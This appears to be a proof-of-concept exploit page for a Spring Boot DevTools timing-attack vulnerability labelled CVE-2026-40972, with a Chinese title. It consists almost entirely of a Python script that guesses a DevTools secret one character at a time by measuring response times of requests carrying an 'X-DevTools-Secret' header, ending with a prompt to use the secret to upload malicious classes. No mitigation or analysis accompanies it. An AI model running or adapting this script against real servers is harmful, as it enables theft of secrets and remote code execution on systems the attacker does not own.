CVE-2026-40972 Spring Boot DevTools时序攻击致RCE漏洞

import requests import time import string # Target configuration target_url = "http://vulnerable-app:8080" # Base HTTP headers used by DevTools headers = { "User-Agent": "Mozilla/5.0" } # Charset for the secret charset = string.ascii_letters + string.digits + "_" extracted_secret = "" print("[+] Starting Timing Attack for CVE-2026-40972") # Assume secret length is 32 (adjust based on observations) for i in range(32): timings = {} for char in charset: # Construct the guess guess = extracted_secret + char # Send request with the guessed secret in the header # Note: The actual header name depends on Spring Boot DevTools configuration test_headers = headers.copy() test_headers["X-DevTools-Secret"] = guess start_time = time.time() try: requests.get(target_url, headers=test_headers, timeout=2) except Exception as e: # Ignore connection errors for timing analysis focus pass end_time = time.time() elapsed = end_time - start_time timings[char] = elapsed # Find the character that took the longest (most likely correct) likely_char = max(timings, key=timings.get) extracted_secret += likely_char print(f"[+] Progress: {extracted_secret}") print(f"[+] Extracted Secret: {extracted_secret}") print("[!] Use the extracted secret to upload malicious classes.")